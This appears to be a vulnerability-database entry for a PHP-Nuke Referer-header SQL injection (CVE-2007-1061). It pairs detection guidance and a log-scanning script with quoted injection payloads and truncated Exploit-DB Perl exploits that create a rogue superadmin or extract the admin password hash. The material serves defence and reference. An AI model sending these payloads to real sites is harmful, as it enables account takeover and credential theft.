CVE-2007-1061
Published 2007-02-22
Priority P3 · 53 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT · EPSS 60.77% (99.0th percentile)
SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header (HTTP_REFERER variable).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | <= 8.0_final | — |
Detection & IOCs (extracted from sources)
command: http://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', 'http://www.krasza.int.pl', 'krasza@gmail.com', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '
command: http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*
command: http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*
- Inspect the HTTP Referer header on all requests to index.php for SQL metacharacters, particularly single quotes followed by SQL keywords such as INSERT, SELECT, or comment sequences (/* or --).
- Alert on Referer headers containing INSERT INTO `nuke_authors` payloads, which indicate an attempt to create a rogue superadmin account.
- Alert on Referer headers containing subqueries targeting `nuke_authors` with `radminsuper`=1, indicating credential extraction via the HTTP Referers block display.
- The blind time-based SQLi variant uses BENCHMARK() in the Referer header; monitor for anomalously slow responses to index.php correlated with Referer values containing BENCHMARK or IF() constructs.
- The exploit targets the 'HTTP Referers' block feature specifically; disabling this block removes the injection surface entirely.
- The SQL injection is only exploitable when the 'HTTP Referers' block is enabled in PHP-Nuke; installations with this block disabled are not affected.
- The INSERT-based exploit (EDB-3345) is stated to work on every database except MySQL; the blind time-based exploit (EDB-3344) is MySQL-specific using BENCHMARK().
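The Referer checks listed above, sketched as an access-log scanner. This is an added example, not part of the original record or any vendor rule set; it assumes Apache/nginx combined-format logs, and the rule names, the `scan` helper and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>(?:[^"\\]|\\.)*)"')

# One rule per indicator listed above; the rule names are this example's own.
RULES = [
    ("rogue-superadmin-insert",
     re.compile(r"insert\s+into\s+`?nuke_authors`?", re.I)),
    ("credential-subquery",
     re.compile(r"select\b.*\bfrom\s+`?nuke_authors`?.*radminsuper", re.I)),
    ("time-based-blind", re.compile(r"\b(?:benchmark|if)\s*\(", re.I)),
    ("quote-then-sql",
     re.compile(r"'[^']*?(?:\b(?:insert|select|union|update|delete)\b|/\*|--)", re.I)),
]

def scan(lines):
    """Return (line_no, client_ip, [rule names]) for each suspicious request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Assumption: the front page is served as /index.php or as "/".
        if not m["path"].split("?", 1)[0].endswith(("index.php", "/")):
            continue
        referer = unquote(m["referer"])  # also catch percent-encoded variants
        hits = [name for name, rx in RULES if rx.search(referer)]
        if hits:
            findings.append((no, m["ip"], hits))
    return findings

# Constructed sample log; Referer values reuse the payload shapes quoted above.
SAMPLE_LOG = r'''
203.0.113.5 - - [20/Feb/2007:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "http://example.org/o'brien.html" "Mozilla/5.0"
198.51.100.7 - - [20/Feb/2007:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*" "libwww-perl/5.805"
198.51.100.7 - - [20/Feb/2007:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "http://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', '" "libwww-perl/5.805"
198.51.100.9 - - [20/Feb/2007:10:00:03 +0000] "GET / HTTP/1.1" 200 5120 "http://example.org/',BENCHMARK(1,1))/*" "libwww-perl/5.805"
203.0.113.5 - - [20/Feb/2007:10:00:04 +0000] "GET /modules.php?name=News HTTP/1.1" 200 900 "http://example.org/" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign Referer containing an apostrophe on the first sample line is not flagged, because the generic rule requires a SQL keyword or comment opener after the quote.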
No detection rules found.
Exploit-DB
Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)
exploitdb · 2008-07-11 · CVE-2008-2304
---
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [email protected]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' , "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fn
Exploit-DB
PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
exploitdb · 2007-02-20 · CVE-2007-1061
---
#!/usr/bin/perl
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
$referer="http://www.krasza.int.pl');INSERT INTO `nuke_authors` VALUES ('krasza', 'God', 'http://www.krasza.int.pl', 'krasza\@gmail.com', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]I registered new superadmin\n";
print "[+]You can login at $adres \n";
print "[+]Login:krasza\n";
print "[+]Password:krasza\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version for every
Exploit-DB
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
exploitdb · 2007-02-20 · CVE-2007-1061
---
#!/usr/bin/perl
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer);
$respone=$ua->request($zadanie);
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nu
Exploit-DB
PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
exploitdb · 2007-02-20 · CVE-2007-1061
---
#!/usr/bin/perl
#0day exploit for PHP-nuke = 4.0.24, using 'brute force'
#Coded by:Maciej `krasza` Kukla[[email protected]]
#Screenshot:
#0day exploit for PHP-nuke new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,$hash,$referer,$czy_dziala,$znak);
banner();
$czas_nor=polacz("http://www.krasza.int.pl");
print "[+]Time normal query: $czas_nor seconds\n";
$dlugosc_user=ustal_dlugosc("aid",8);
print "[+]Length user's record: $dlugosc_user\n";
print "[+]Length password's record: 32\n";
print "[+]Login:\n";
$user=brute_force_aid($dlugosc_user);
print "[+]Password:\n";
$hash=brute_force_pass(32);
print "[+]Super admin:\n";
print "$user:$hash\n";
##
sub br
No writeups or analysis indexed.
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052570.html
- http://osvdb.org/33316
- http://secunia.com/advisories/24224
- http://www.securityfocus.com/archive/1/461148/100/0/threaded
- http://www.securityfocus.com/bid/22638
- http://www.vupen.com/english/advisories/2007/0673
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32607
- https://www.exploit-db.com/exploits/3346